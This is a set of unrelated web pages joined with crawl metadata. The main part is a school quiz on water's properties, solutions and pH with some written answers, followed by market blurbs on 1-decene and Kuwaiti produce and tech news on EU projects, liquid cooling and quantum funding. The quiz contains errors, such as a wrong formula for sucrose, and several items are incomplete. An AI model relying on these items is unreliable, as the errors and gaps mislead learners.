10) The ________ pressure is the pressure required to prevent the flow of solvent through a solvent-permeable membrane that separates two solutions of different solute concentration.
A) hydrostatic B) electromotive C) osmotic D) partial

11) Which is true about the solubility of electrolytes in water?
A) They are all insoluble in water. B) They are usually only sparingly soluble in water. C) They often form super-saturated aqueous solutions. D) They readily dissolve and ionize in water.
12) The water molecule is
Slightly negative near the hydrogen atoms and slightly positive near the oxygen atom
Slightly positive in all areas of the molecule
Slightly negative near the oxygen atom and slightly positive near the hydrogen atoms
The same charge in all areas of the molecule
13) A paper clip can stay on the surface of a sample of water because of water’s strong surface tension. Water’s surface tension is mostly a result of
The motion of water molecules
The attraction of water molecules
The impurities in the water
14) Sodium chloride is made up of sodium ions and chloride ions which bond together in a salt crystal because
They have the same charge
They are the same size
One is positive and one is negative so they attract
They both have protons and electrons
15) Water is able to dissolve sodium chloride because
The polar areas of water molecules attract the oppositely charged ions of sodium chloride
The shape of the water molecules pushes the sodium and chloride ions apart
The oxygen in the water molecules reacts with the sodium and chloride ions
Water molecules and sodium chloride are covalently bonded
16) Water cannot dissolve all substances that are made from ionic bonds. This is probably because
Some water molecules are not as strong as others
Water needs to be stirred to dissolve all ionic substances
Some ionic bonds are too strong for the attractions of water molecules to pull them apart
Water needs to be heated to dissolve all ionic substances
17) The chemical formula for sucrose (sugar) is C6H12O6. In some parts of the sucrose molecule, oxygen is covalently bonded to hydrogen. This makes the sucrose molecule
Bonded like salt
Smaller than a water molecule
A polar molecule
Act like a liquid
18) Sucrose dissolves well in water because
Water is usually warm
Sucrose is used to make sweet beverages
Polar water molecules attract the opposite polar areas of the sucrose molecules
Polar water molecules attract the carbon atoms in the sucrose molecules
19) When sucrose dissolves in water
The sucrose molecules break apart into individual atoms
The water molecules covalently bond to the sucrose molecules
The water molecules cause the sucrose molecules to separate from one another
Each sucrose molecule breaks in half
20) Alcohol molecules are not as polar as water molecules. If you mixed sucrose in alcohol you might expect the sucrose
To dissolve better in alcohol than in water
To dissolve in alcohol not as well as in water
To dissolve equally well in alcohol and in water
To increase in size
21) Water is not a good dissolver of oil mainly because
Oil is also a liquid
Oil is thicker than water
Oil molecules are non-polar
Oil is colder than water
22) Carbon dioxide gas dissolves pretty well in water because
The molecules of a gas are far apart compared to the molecules of a liquid
The bond between the carbon and oxygen in the carbon dioxide is polar
Water can dissolve anything with carbon
Water molecules are non-polar
23) The amount of gas that can dissolve in water
Increases as the temperature of the water increases
Increases as the temperature of the water decreases
Does not change when the temperature of the water changes
Does not depend on the type of gas
24) When certain substances dissolve, the solution gets warmer. This type of dissolving process is exothermic. In exothermic dissolving
More energy is released when water molecules bond to the solute than is used to pull the solute apart.
More energy is used to pull the solute apart than is released when water molecules bond to the solute.
A gas is always produced
The temperature does not change
25) When certain substances dissolve, the solution gets colder. This type of dissolving process is endothermic. In endothermic dissolving
Water molecules break apart into atoms
26)What does it mean to say that something is a “polar molecule”?
A polar molecule has a net dipole as a result of the opposing charges (i.e. having partial positive and partial negative charges) from polar bonds arranged asymmetrically. Water (H2O) is an example of a polar molecule since it has a slight positive charge on one side and a slight negative charge on the other.
27) What is surface tension and why does water have a strong surface tension?
In a sample of water, there are two types of molecules. Those that are on the outside, exterior, and those that are on the inside, interior. The interior molecules are attracted to all the molecules around them, while the exterior molecules are attracted to only the other surface molecules and to those below the surface. This makes it so that the energy state of the molecules on the interior is much lower than that of the molecules on the exterior. Because of this, the molecules try to maintain a minimum surface area, thus allowing more molecules to have a lower energy state. This is what creates what is referred to as surface tension.
28) You put a drop of water and a drop of alcohol on a paper towel and saw that the alcohol evaporated faster than the water. Alcohol molecules are not as polar as water molecules. Use the difference in polarity between water and alcohol molecules to explain why alcohol evaporates faster than water.
A more polar liquid has stronger attractive forces between its molecules than a liquid with weaker polarity, so more energy is required to break the lattice of the liquid with the greater polarity. Alcohol therefore requires less energy to break its lattice and evaporates faster.
29) The surface of water bends but doesn’t break under the weight of a paper clip or water strider. What is it about water molecules and the way they interact that gives water this strong surface tension?
The strong polarity of water will produce large numbers of hydrogen bonds forming a strong lattice.
30) You put drops of water and alcohol on the surface of two pennies. The water held together and beaded up more than the alcohol. Also, more drops of water than alcohol stayed on the penny. If water molecules are more polar than alcohol molecules, explain why this happened.
The strong polarity of water will produce large numbers of hydrogen bonds forming a strong lattice. This will keep the water molecules together forming a bead.
31) Briefly explain, on the molecular level, how water dissolves salt.
When added to water, the Na+ part of NaCl is attracted to the oxygen side of the water molecules, while the Cl- part is attracted to the hydrogen side of the water molecules. This causes the sodium chloride to split apart in water, and the NaCl dissolves into separate Na+ and Cl- ions. A hydration shell forms around them, which prevents the Na+ and Cl- from re-forming ionic bonds.
32) Why does water dissolve salt more effectively than isopropyl alcohol does?
Water is more polar than isopropyl alcohol.
33) Why does sugar not dissolve in mineral oil?
Mineral oil is a lipid and is nonpolar. Sugar is a polar molecule. Polar molecules will not dissolve in nonpolar liquids.
34) Why does increasing the temperature cause more solute to dissolve in a solvent?
The movement of the molecules (kinetic energy) in a solvent increases with increasing temperature. The force of the collisions with a solute is greater, enabling the solute to dissolve faster.
35) What are the four emergent properties of water that are important for life?
cohesion, expansion upon freezing, high heat of evaporation, capillarity
cohesion, moderation of temperature, expansion upon freezing, solvent properties
moderation of temperature, solvent properties, high surface tension, capillarity
heat of vaporization, high specific heat, high surface tension, capillarity
polarity, hydrogen bonding, high specific heat, high surface tension
36) Water shows high cohesion and surface tension and can absorb large amounts of heat because of large numbers of which of the following bonds between water molecules?
strong ionic bonds
nonpolar covalent bonds
polar covalent bonds
weak ionic bonds
37) Water has an unusually high specific heat. What does this mean?
At its boiling point, water changes from liquid to vapor.
More heat is required to raise the temperature of water.
Ice floats in liquid water.
Salt water freezes at a lower temperature than pure water.
Floating ice can insulate bodies of water.
38) In a glass of old-fashioned lemonade, which is the solvent?
39) Compared to an acidic solution at pH 5, a basic solution at pH 8 has
1,000 times more hydrogen ions.
1,000 times less hydrogen ions.
100 times less hydrogen ions.
the same number of hydrogen ions but more hydroxide ions.
100 times less hydroxide ions.
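A quick worked check of the arithmetic behind question 39 (added for clarity; not part of the original answer key):

[H+] = 10^-pH
pH 5: [H+] = 10^-5 M;  pH 8: [H+] = 10^-8 M
ratio = 10^-5 / 10^-8 = 10^3 = 1,000

So the pH 8 solution has 1,000 times fewer hydrogen ions, and correspondingly more hydroxide ions, since [H+][OH-] = 10^-14 in water.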
40) Which of the following acts as a pH buffer in blood?
A and B
41) Scientists predict that acidification of the ocean will lower the concentration of dissolved carbonate ions (CO32), which are required for coral reef calcification. To test this hypothesis, what would be the independent variable?
the rate of calcification
the amount of atmospheric CO2
volume of seawater
42) Based on this graph, what is the relationship between carbonate ion concentration and calcification rate?
As the acidity of the seawater increased, the rate of calcification decreased.
As the rate of calcification increased, the concentration of carbonate ions increased.
As the concentration of carbonate ions increased, the rate of calcification decreased.
As the concentration of carbonate ions increased, the rate of calcification increased.
43) If the seawater carbonate ion concentration is 250 µmol/kg, what is the approximate rate of calcification according to this graph?
5 mmol CaCO3 per m2 per day
10 mmol CaCO3 per m2 per day
15 mmol CaCO3 per m2 per day
20 mmol CaCO3 per m2 per day
44) This figure suggests that increased atmospheric concentrations of CO2 will slow the growth of coral reefs. Do the results of the previous experiment support that hypothesis?
No; more atmospheric CO2 causes a decrease in the amount of CO32 in seawater, leading to faster reef growth.
Yes; more CO2 causes an increase in the amount of CO32 in seawater, leading to slower reef growth.
No; more atmospheric CO2 causes an increase in the amount of CO32 in seawater, leading to faster reef growth.
Yes; more CO2 causes a decrease in the amount of CO32 in seawater, leading to slower reef growth.
45) In a single molecule of water, two hydrogen atoms are bonded to a single oxygen atom by _____.
A) hydrogen bonds
B) nonpolar covalent bonds
C) polar covalent bonds
D) ionic bonds
46) The partial negative charge at one end of a water molecule is attracted to the partial positive charge of another water molecule. What is this attraction called?
A) a covalent bond
B) a hydrogen bond
C) an ionic bond
D) a van der Waals interaction
47) The partial negative charge in a molecule of water occurs because _____.
A) the oxygen atom donates an electron to each of the hydrogen atoms
B) the electrons shared between the oxygen and hydrogen atoms spend more time around the oxygen atom nucleus than around the hydrogen atom nucleus
C) the oxygen atom has two pairs of electrons in its valence shell that are not neutralized by hydrogen atoms
D) one of the hydrogen atoms donates an electron to the oxygen atom
48) Water molecules can form hydrogen bonds with _____.
A) compounds that have polar covalent bonds
C) oxygen gas (O2) molecules
D) chloride ions
49) Which of the following is a property of liquid water? Liquid water _____.
A) is less dense than ice
B) has a specific heat that is lower than that for most other substances
C) has a heat of vaporization that is higher than that for most other substances
D) is nonpolar
50) Which of the following can be attributed to water's high specific heat?
A) Oil and water do not mix well.
B) A lake heats up more slowly than the air around it.
C) Ice floats on water.
D) Sugar dissolves in hot tea faster than in iced tea.
51) The cities of Portland, Oregon, and Minneapolis, Minnesota, are at about the same latitude, but Minneapolis has much hotter summers and much colder winters than Portland. Why?
A) They are not at the same exact latitude.
B) The ocean near Portland moderates the temperature.
C) Fresh water is more likely to freeze than salt water.
D) Minneapolis is much windier, due to its location in the middle of North America.
52) To act as an effective coolant in a car's radiator, a substance has to have the capacity to absorb a great deal of heat. You have a reference book with tables listing the physical properties of many liquids. In choosing a coolant for your car, which table would you check first?
B) density at room temperature
C) heat of vaporization
D) specific heat
53) Water has many exceptional and useful properties. Which is the rarest property among compounds?
A) Water is a solvent.
B) Solid water is less dense than liquid water.
C) Water has a high heat capacity.
D) Water has surface tension.
54) Which of the following effects can occur because of the high surface tension of water?
A) Lakes cannot freeze solid in winter, despite low temperatures.
B) A raft spider can walk across the surface of a small pond.
C) Organisms can resist temperature changes, although they give off heat due to chemical reactions.
D) Sweat can evaporate from the skin, helping to keep people from overheating.
55) Which of the following takes place as an ice cube cools a drink?
A) Molecular collisions in the drink increase.
B) Kinetic energy in the liquid water decreases.
C) A calorie of heat energy is transferred from the ice to the water of the drink.
D) The specific heat of the water in the drink decreases.
56) Which type of bond must be broken for water to vaporize?
A) ionic bonds
B) polar covalent bonds
C) hydrogen bonds
D) both polar covalent bonds and hydrogen bonds
57) Why does ice float in liquid water?
A) The high surface tension of liquid water keeps the ice on top.
B) The ionic bonds between the molecules in ice prevent the ice from sinking.
C) Stable hydrogen bonds keep water molecules of ice farther apart than water molecules of liquid water.
D) The crystalline lattice of ice causes it to be denser than liquid water.
58) Hydrophobic substances such as vegetable oil are _____.
A) nonpolar substances that repel water molecules
B) nonpolar substances that have an attraction for water molecules
C) polar substances that repel water molecules
D) polar substances that have an affinity for water
59) Identical heat lamps are arranged to shine on two identical containers, one containing water and one methanol (wood alcohol), so that each liquid absorbs the same amount of energy minute by minute. The covalent bonds of methanol molecules are nonpolar, so there are no hydrogen bonds among methanol molecules. Which of the following graphs correctly describes what will happen to the temperature of the water and the methanol?
60) You have two beakers. One contains pure water, the other contains pure methanol (wood alcohol). The covalent bonds of methanol molecules are nonpolar, so there are no hydrogen bonds among methanol molecules. You pour crystals of table salt (NaCl) into each beaker. Predict what will happen.
A) Equal amounts of NaCl crystals will dissolve in both water and methanol.
B) NaCl crystals will not dissolve in either water or methanol.
C) NaCl crystals will dissolve readily in water but will not dissolve in methanol.
D) NaCl crystals will dissolve readily in methanol but will not dissolve in water.
61) Define a buffer and provide an example.
A buffer solution is one which resists changes in pH when small quantities of an acid or a base are added to it.
An acidic buffer solution is simply one which has a pH less than 7. Acidic buffer solutions are commonly made from a weak acid and one of its salts usually sodium salt. An example is carbonic acid + Na carbonate, the buffer which modulates the pH of blood.
A basic buffer solution is simply one which has a pH greater than 7. Basic buffer solutions are commonly made from a weak base and one of its salts, usually a chloride salt. An example is ammonium hydroxide + ammonium chloride.
62) Consider the following reaction at equilibrium: CO2 + H2O ⇌ H2CO3. What would be the effect of adding additional H2CO3?
A) It would drive the equilibrium dynamics to the right.
B) It would drive the equilibrium dynamics to the left.
C) Nothing would happen, because the reactants and products are in equilibrium.
D) The amounts of CO2 and H2O would decrease.
63) Which of the following statements is true about buffer solutions?
A) They maintain a constant pH when bases are added to them but not when acids are added to them.
B) They maintain a constant pH when acids are added to them but not when bases are added to them.
C) They fluctuate in pH when either acids or bases are added to them.
D) They maintain a relatively constant pH when either acids or bases are added to them.
64) Increased atmospheric CO2 concentrations might have what effect on seawater?
A) Seawater will become more alkaline, and carbonate concentrations will decrease.
B) There will be no change in the pH of seawater, because carbonate will turn to bicarbonate.
C) Seawater will become more acidic, and carbonate concentrations will decrease.
D) Seawater will become more acidic, and carbonate concentrations will increase.
65) How would acidification of seawater affect marine organisms? Acidification of seawater would _____.
A) increase dissolved carbonate concentrations and promote faster growth of corals and shell-building animals
B) decrease dissolved carbonate concentrations and promote faster growth of corals and shell-building animals
C) increase dissolved carbonate concentrations and hinder growth of corals and shell-building animals
D) decrease dissolved carbonate concentrations and hinder growth of corals and shell-building animals
66) If the cytoplasm of a cell is at pH 7, and the mitochondrial matrix is at pH 8, then the concentration of H+ ions _____.
A) is 10 times higher in the cytoplasm than in the mitochondrial matrix
B) is 10 times higher in the mitochondrial matrix than in the cytoplasm
C) in the cytoplasm is 7/8 the concentration in the mitochondrial matrix
D) in the cytoplasm is 8/7 the concentration in the mitochondrial matrix
67) The loss of water from a plant by transpiration cools the leaf. Movement of water in transpiration requires both adhesion to the conducting walls and wood fibers of the plant and cohesion of the molecules to each other. A scientist wanted to increase the rate of transpiration of a crop species to extend its range into warmer climates. The scientist substituted a nonpolar solution with an atomic mass similar to that of water for hydrating the plants. What do you expect the scientist’s data will indicate from this experiment?
A) The rate of transpiration will be the same for both water and the nonpolar substance.
B) The rate of transpiration will be slightly lower with the nonpolar substance as the plant will not have evolved with the nonpolar compound.
C) Transpiration rates will fall to zero as nonpolar compounds do not have the properties necessary for adhesion and cohesion.
D) Transpiration rates will increase as nonpolar compounds undergo adhesion and cohesion with wood fibers more readily than water.
68) In living systems molecules involved in hydrogen bonding almost always contain either oxygen or nitrogen or both. How do you explain this phenomenon?
A) Oxygen and nitrogen are elements found in both nucleic acids and proteins.
B) Oxygen and nitrogen are elements with very high attractions for their electrons.
C) Oxygen and nitrogen are elements found in fats and carbohydrates.
D) Oxygen and nitrogen were both components of gases that made up the early atmosphere on Earth.
C) Seawater will become more acidic, and carbonate concentrations will decrease.
Decene is an unsaturated aliphatic hydrocarbon whose isomers differ mainly in the position and geometry of the double bond. It is an alkene (C10H20) containing ten carbon atoms and one double bond. Positional isomers such as 1-decene and 3-decene are collectively known as decene; however, 1-decene is the industrially important isomer.
1-Decene is produced by the industrial oligomerization of ethylene, using the Ziegler process, or by cracking petrochemical waxes. The production volume of 1-decene varies according to customer requirements, from a few metric tons to hundreds of thousands of metric tons.
This alpha-olefin is used as a monomer in copolymers and is an intermediate in the production of epoxides, amines, oxo alcohols, synthetic lubricants, synthetic fatty acids and alkylated aromatics. 1-Decene is also used as a feedstock for the production of surfactants (alkyl aromatics and detergent alcohols) and of linear alkylbenzene sulfonates, which are used in lube-oil additives, all-purpose cleaners, dishwashing liquids and laundry detergents.
1-Decene is used in lubricants, detergent alcohols and oilfield chemicals, among others; however, under certain conditions (in the presence of various catalysts, such as acids), it may undergo exothermic addition polymerization reactions and attack some forms of plastic. At high concentrations, 1-decene may irritate the eyes and the respiratory tract.
Alpha olefins are sensitive to moisture, so contact with air or oxygen should be avoided: auto-oxidation forms impurities, which give rise to subsequent reactions. They should be kept dry and handled under an inert gas atmosphere. As with all hydrocarbons, alpha olefins can form explosive mixtures with oxygen or air at certain concentrations. 1-Decene is stored under a nitrogen blanket and is not corrosive to steel or aluminium.
In Western Europe, surfactant consumption of linear alkylbenzene sulfonates, soaps and other surfactants is largely in the household sector (41%), followed by the industrial sector (39%) and personal care (20%). Europe is expected to see growth of 0.5-1.0% over the forecast period (2012-18).
The 1-decene market is segmented by application and by company. Applications include linear and branched alkylbenzenes, alpha olefin sulfonates (AOS), detergent alcohols, lubricants and oilfield chemicals. Companies active in the 1-decene market include Dow Chemical Company, Evonik Industries AG, Exxon Mobil Corp., Godrej Industries Ltd., and Mitsubishi Chemical Corporation.
Kuwait has about 10% of the world's oil reserves. Petroleum accounts for at least half of its GDP and 95% of its export revenue, and the country's growing economy is mostly due to oil exports. The agriculture sector plays a minor role in the country's economic growth: Kuwait imports most of its fruits and vegetables, as domestic production capability is low due to the unfavorable climate, soil infertility and water scarcity. The fruit market in Kuwait reached XXX thousand metric tons in 2017 and is expected to reach XXX thousand metric tons by 2022. The Kuwaiti vegetable market reached XXX thousand metric tons in 2017 and is expected to reach XXX thousand metric tons by 2022. The growing market for fruits and vegetables in Kuwait is attributed to rising disposable incomes and the increasing health awareness of the Kuwaiti population.
The country has a total arable land area of about 10,600 hectares, which is about 0.6% of the total land area. This domestic production capacity is not enough to meet the growing demand for fruits and vegetables. Kuwait is the second most populous country in the GCC region, with an average population growth rate of 3.5%. Domestic production capability for fruits and vegetables is low, as the soil in the region is low in organic content and has poor nutrient-holding and moisture-retaining capacity. The natural water resources available for irrigation are minimal; most irrigation water comes from desalination plants, which consume a lot of electricity, and domestic farmers cannot bear the costs, as electricity is not subsidized. Thus, the harsh climatic conditions and vulnerable water and soil resources are the major constraints on Kuwait's agriculture sector; hence, the country is mostly dependent on imports of fruits and vegetables.
The government of Kuwait is encouraging agricultural companies to invest in foreign countries that have a comparative advantage in producing certain crops and import their products back into Kuwait. The crops targeted by this initiative include wheat, rice, barley, yellow corn, soybeans, and green forage. The Kuwaiti government is providing financial incentives to encourage investors in the country to take part in this food security initiative and invest overseas.
Market Segmentation - By Fresh Fruits and Vegetables
The agricultural market in Kuwait is segmented by product type into fruits and vegetables. These are sub-segmented into onions, potatoes, tomatoes, garlic, cauliflower, cucumber, cabbage, beans, eggplant, lemons, apples, bananas, oranges, grapes, strawberry, watermelon, grapefruit, dates, and olives.
About the Market | <urn:uuid:29bc4a41-9edf-4136-9290-16062460584b> | CC-MAIN-2017-04 | https://www.mordorintelligence.com/industry-reports/fruits-and-vegetables-industry-in-kuwait-industry | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00052-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940576 | 538 | 2.671875 | 3 |
Robots, brains, the EU’s got it all.
The public sector isn’t renowned for its speed of innovation, but the EU is a different story. With a Digital Agenda, it’s innovating in all sorts of exciting areas that have the potential to shape the world around us for decades to come.
Here CBR takes a look at some of the best projects.
The Human Brain Project
Launched in October last year, this ambitious scheme sets out to map the human brain. Covering researchers from 15 EU states and nearly 200 research institutes, the EU committed €1bn back in January 2013 to the project in order to finance 10 years of study.
It should collect all the data the world has gathered about the brain and store it using completely new computing technology.
European Commission VP Neelie Kroes, responsible for the Digital Agenda, said last month: "The brain is a fascinating thing. Digital tools enable us to make huge progress in understanding the brain, but also to learn from it: from better treatment of brain diseases, to building the next generation of supercomputers."
Another €8.3m in March this year provided enough cash to get another 32 organisations from 13 more countries on board, whose job it is to collect data and work on developing the groundwork for six ICT platforms dedicated to Neuroinformatics, Brain Simulation, High Performance Computing, Medical Informatics, Neuromorphic Computing and Neurorobotics. | <urn:uuid:6c4103fb-43f1-478c-90ab-8c2e0e985174> | CC-MAIN-2017-04 | http://www.cbronline.com/news/enterprise-it/it-network/5-big-eu-tech-projects-you-should-follow-4214352 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00226-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.918321 | 307 | 2.59375 | 3 |
One of the greatest challenges to high compute densities is cooling: at a certain point, air no longer suffices to remove the waste heat that tightly packed equipment produces. Thus, high-density data center deployments, supercomputers and other high-performance-computing (HPC) applications are increasingly turning to liquid cooling. The recent SC13 supercomputing conference saw one particular kind of liquid cooling—immersion—make a strong showing, according to DatacenterDynamics. Immersion cooling involves submerging servers in a nonconducting liquid, avoiding the need to pipe liquid in a rack or even inside a server box or processor enclosure.
Liquid cooling creates certain infrastructure challenges that air avoids, but in cases where high performance is required, the costs may be justified. In addition, since it enables higher densities while maintaining safe operating temperatures, it means that precious resources like data center space can be conserved, forestalling the need to build new facilities to create more space.
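A back-of-the-envelope calculation shows why liquids are so much better at this job than air. It uses textbook constants for water and sea-level air; actual immersion fluids are dielectric liquids with somewhat lower heat capacity than water, so treat this as an upper-bound illustration:

# Heat a coolant can carry away per cubic metre per kelvin: rho * c
water = {"density": 998.0, "specific_heat": 4186.0}  # kg/m^3, J/(kg*K)
air   = {"density": 1.2,   "specific_heat": 1005.0}  # kg/m^3, J/(kg*K)

def volumetric_heat_capacity(fluid: dict) -> float:
    return fluid["density"] * fluid["specific_heat"]

ratio = volumetric_heat_capacity(water) / volumetric_heat_capacity(air)
print(f"Water: {volumetric_heat_capacity(water):.2e} J/(m^3*K)")
print(f"Air:   {volumetric_heat_capacity(air):.2e} J/(m^3*K)")
print(f"Water carries roughly {ratio:.0f}x more heat per unit volume.")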
Read more about liquid cooling | <urn:uuid:3425bf1d-b467-4530-9885-52f0a5680983> | CC-MAIN-2017-04 | http://www.datacenterjournal.com/liquid-cooling-aids-supercomputing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00531-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.882112 | 206 | 2.90625 | 3 |
Based on the number of prominent research projects currently in the works, 2014 could be a tipping point for the field of personalized medicine and in silico research. Last week, the Insigneo Institute at the University of Sheffield spotlighted its Virtual Physiological Human (VHP) program, which the project’s backers describe as “transcending sci fi and transforming healthcare.”
The goal of the VHP project is to create an in silico replica of a living human body to enable drug testing and other medical treatments. The model will be used directly in clinical practice to improve diagnosis and outcome.
Founded one year ago, the institute is celebrating the first phase of the technology. The program is funded by the European Commission, which has invested nearly €220 million since 2007 to advance in silico projects across Europe.
VHP will rely on integrated computer models of the mechanical, physical and biochemical functions of a living human body that enable it to operate as a cohesive whole. In fact, a main aim of the project is to facilitate a paradigm change in which the body is seen as a single multi-organ system instead of as a collection of individual organs.
The project has already made a lot of headway in its first year, addressing a wide range of medical problems, including pulmonary disease, coronary artery disease, bone fractures and Parkinson’s Disease.
“What we’re working on here will be vital to the future of healthcare,” stated Dr. Keith McCormack, who leads business development at the Institute. “Pressures are mounting on health and treatment resources worldwide. Candidly, without in silico medicine, organisations like the NHS will be unable to cope with demand. The Virtual Physiological Human will act as a software-based laboratory for experimentation and treatment that will save huge amounts of time and money and lead to vastly superior treatment outcomes.”
The Insigneo Institute for in silico Medicine includes more than 120 academics and clinicians who are collaborating to develop computer simulations of the human body and its disease processes. The researchers expect that once the virtual human is complete, it will be the most advanced application of computing technology in healthcare. | <urn:uuid:c8e2908e-15f0-4225-a42f-46a76bd650e0> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/05/19/virtual-human-program-aims-transform-healthcare/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00347-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939045 | 444 | 2.671875 | 3 |
Debunking the top foodborne illness-related myths
Tuesday, Jul 30th 2013
Although many restaurants and food service providers do everything they can to ensure the safety and quality of their products, including using state-of-the-art temperature monitoring equipment for their cold storage units, foodborne illness still afflicts millions of Americans every year. According to the Centers for Disease Control and Prevention, one out of every six U.S. residents becomes sick from food poisoning every year, representing close to 48 million people in total. Furthermore, approximately 128,000 end up in the hospital and 3,000 perish annually because of a foodborne illness.
Many factors contribute to these statistics, but one of the main reasons is that many diners and restaurant managers erroneously think that their practices and standards are good enough. However, these assumptions are often based on myth, and their prevalence results in many people unnecessarily falling ill every year. In particular, here are the top three foodborne illness-related myths to keep in mind:
1) Government inspectors always stop violators
Local, state and federal officials work hard to cite food service institutions that break the rules relating to food safety. However, these agencies are simply not able to stop everyone. For instance, a behind-the-scenes video shot by a Golden Corral employee earlier this year showed that one restaurant manager supposedly hid meat and cooking supplies in a back alley to prevent government inspectors from noticing a number of health code violations.
"In this case, and perhaps hundreds more around the country that go unnoticed, it seems management chose deception over honesty," Richard Console of the law firm Console and Hollawell wrote in a July blog post. "It's a big gamble. On one side there's the need to keep the business open, and on the other is the state's requirement that the restaurant follow proper health and safety regulations. Shady restaurant owners who decide to game the system turn health inspectors into police officers when all these professionals try to do is prevent foodborne illnesses and help owners avoid lawsuits."
2) Only meat can lead to food poisoning
In many cases, especially in high-profile incidents, the noted cause of a particular outbreak is an animal protein, be it fish, shellfish, poultry or red meat. However, this does not mean that fruits and vegetables are immune from being the root cause of a foodborne illness. According to the CDC, plant-based foods such as grains, vegetables, fruits and nuts can all lead to food poisoning and as such should be carefully stored in a room equipped with the proper temperature monitoring equipment.
3) Alcohol kills all bad pathogens
Although alcohol can act as a disinfectant, no restaurant owner or patron should think that a stiff drink will protect them. Instead, the only real way to prevent the spread of foodborne illnesses, according to Console, is to keep surfaces clean and to ensure that food is at the right temperature at all times. This means that dishes should be cooked to at least 140 degrees Fahrenheit, and cold storage units containing everything from cheese and milk to steaks and lettuce should be 40 degrees or cooler.
"Violating health code standards isn't acceptable, and by that I mean it's illegal," Console wrote. "Those who ignore them willfully walk a dangerous line of liability when their actions harm others. We have more at stake here than just a sea of upset stomachs and a couple days spent in bed. People die every year from foodborne illnesses that may have been prevented had restaurant owners or manufacturers held their products and employees to the letter of state and federal health statutes. Let's not wait for another teen with a cell phone and YouTube account to expose a restaurant's sneaky (and dangerous) food practices before we take more proactive steps." | <urn:uuid:0fc94066-ef78-464a-8a3c-f263fb9d498b> | CC-MAIN-2017-04 | http://www.itwatchdogs.com/environmental-monitoring-news/cold-storage/debunking-the-top-foodborne-illness-related-myths-483215 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00255-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.96465 | 763 | 2.59375 | 3 |
The Google Maps feature lets you plot your network resources at their physical locations on a map. This gives network administrators a feel for how distributed their network is and, more importantly, allows quicker and easier drill-down to resource-specific information. Information on up to 3 top interfaces linked to a router is shown on the map. The Google Map Settings page lists all the devices and their corresponding locations, and gives you the option to place each device in its respective location.
Assigning a location to a router
Clicking on the Assign link opens up the Google map. Follow the instructions below to place a device on the map:
1. Click on the location to place the device on the map. Use the controls on the top left to navigate or zoom
2. You will see an image indicating your selection
3. To change the location click on the image, it will vanish and then select a new location
4. Enter the location in the 'Location Name' field and hit "Save location"
Now a location has been assigned to a router.
Editing a location
To edit a specific location on the map, click on the "Edit" link under the Google Map Settings tab. The map view will open at the location you last specified. To move the pointer to the desired location, click on the area of the map it should point to. If you click several times while repositioning the resource, the last location you click is taken as the final one.
Deleting a location
You may remove any resource/router from being shown on the map by clicking on the delete button against the resource in the Google Map Settings tab.
Resilience is one of the buzzwords running amok in the emergency management profession today. While once we sought to be disaster resistant, today we want to be resilient. The term is a better one than disaster resistant to describe the end state that we are seeking. For an academic look at what it means to be resilient, see Building Resilient Communities: A Preliminary Framework for Assessment
An abstract of the paper is below:
"There is a growing need in the fields of homeland security and disaster management for a comprehensive, yet useful approach to building resilient communities. This article moves beyond the ongoing debate over definitions and presents a preliminary framework for assessing community resilience. Pulling from an interdisciplinary body of theoretical and policy-oriented literature, the authors provide a definition of resilience and develop a theory of community resilience as a function of resource robustness and adaptive capacity. Moving forward, the article develops the groundwork for further operationalization of resilience attributes according to five key community subsystems: ecological, economic, physical infrastructure, civil society, and governance. Through the examination of each community subsystem, a preliminary, community-based, resilience assessment framework is provided for continued development and refinement. When fully developed, the framework will serve as tool for guiding planning and allocating resources."
One thing for sure is that resilience is not measured by the number of widgets you buy with Homeland Security funds. It is grounded in the economics of a community and even the governance of the regional community trying to pull itself out of a disaster.
George Baker shared the link. | <urn:uuid:c0bbcd34-9f37-4f01-9aca-2c5cea34b271> | CC-MAIN-2017-04 | http://www.govtech.com/em/emergency-blogs/disaster-zone/Defining-Disaster-Resilience.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00071-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.925849 | 313 | 2.765625 | 3 |
Last week, the UK government announced that it is investing £270 million toward quantum computing research as part of the government’s long-term economic plan. The funds will be divided among five quantum technology centers over the next five years.
The initiative was announced as part of Chancellor George Osborne’s Autumn Statement, delivered last week in the House of Commons. The network of quantum technology centers is part of the government’s strategy for promoting growth through scientific progress.
The effort supports the creation of new applications and industries – from quantum computation to secure communication.
While conventional computing follows the laws of classical physics, quantum computing adheres to the laws of quantum mechanics, which are radically different. In a quantum computer, the fundamental unit of information is the quantum bit, or qubit. Qubits can exist in the two binary states that we’re all familiar with, but can also exist in a superposition of those two states, allowing a register of qubits to represent an enormous number of states simultaneously. Quantum computing is thus naturally parallel and immensely powerful.
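As a concrete illustration (standard quantum-computing notation, not drawn from the article itself), a single qubit's state is a weighted combination of the two classical values, and an n-qubit register carries an amplitude for each of its 2^n classical bit-strings at once:

```latex
|\psi\rangle = \alpha\,|0\rangle + \beta\,|1\rangle, \qquad |\alpha|^2 + |\beta|^2 = 1,
\qquad\text{and}\qquad
|\Psi\rangle = \sum_{x \in \{0,1\}^n} c_x\,|x\rangle .
```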
A holy grail for scientists, quantum computing is one those areas that seems to always be on the horizon, never quite within reach. While the pace of progress can seem slow, the last five years have seen substantial movement in the field with several sites boasting quantum processors. NASA and Google jointly own a D-Wave system, which is essentially the world’s first quantum computer, although there’s some debate between scientists over the exact meaning of “quantum computer.”
One thing that experts do agree on is that security protocols, like encryption and decryption, are sure to be a killer app. Governments, naturally, are paying close attention to this technology.
Other supporting measures of the Science and Innovation strategy will:
+ create a £75 million a year fund to improve the research and innovation capacity of Emerging Powers and build valuable research partnerships for the UK
